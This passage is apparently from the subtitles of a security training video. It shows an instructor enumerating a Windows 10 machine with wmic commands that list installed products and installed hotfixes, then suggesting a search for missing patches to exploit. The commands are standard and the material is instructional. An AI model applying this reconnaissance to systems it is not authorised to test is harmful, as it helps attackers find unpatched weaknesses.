370 00:27:23,260 --> 00:27:23,680 of those.
371 00:27:24,250 --> 00:27:30,160 One of the things we could do is look at, you know, the installed applications and versions, by
372 00:27:30,160 --> 00:27:31,390 Windows Installer.
373 00:27:31,990 --> 00:27:33,700 I don't think that this one will have it.
374 00:27:33,700 --> 00:27:39,360 But if you're on a different system or if you have some stuff installed that you put on yourself, you
375 00:27:39,700 --> 00:27:46,420 do wmic and then product, and then we're going to put get and we're going to tell it the columns
376 00:27:46,420 --> 00:27:52,580 that we want to see: name, version and vendor, and then we just enter.
377 00:27:52,600 --> 00:27:56,080 So there's no instances because I haven't installed anything on this box.
378 00:27:56,980 --> 00:28:02,980 Another thing we do is look at some updates, like know what updates were installed and when
379 00:28:02,980 --> 00:28:06,580 were they installed, so we could do that wmic command again.
380 00:28:07,210 --> 00:28:10,660 And then we're going to do qfe and then another command.
381 00:28:10,900 --> 00:28:15,570 And now once again, we're going to tell it what columns we actually want it to display, so we can do
382 00:28:15,580 --> 00:28:19,060 Caption, Description.
383 00:28:20,550 --> 00:28:27,570 Then we do HotFixID and then InstalledOn.
384 00:28:29,670 --> 00:28:36,120 Enter, and it's going to tell us, hey, these security updates are installed.
385 00:28:36,160 --> 00:28:37,690 This is when it was installed.
386 00:28:37,930 --> 00:28:43,120 So it gives us an idea of what kind of patches, you know, the system has and doesn't have.
387 00:28:43,300 --> 00:28:48,100 And you can start to look online and try to figure out, you know, what you might be able to take advantage
388 00:28:48,100 --> 00:28:48,190 of.
389 00:28:48,340 --> 00:28:51,630 Maybe it's missing a security patch for, like, a major vulnerability.
390 00:28:51,640 --> 00:28:53,420 You can go ahead and try to take advantage of that.
391 00:28:53,710 --> 00:29:00,340 So that's, like, some basic enumeration for, like, trying to find some vulnerable things in Windows 10.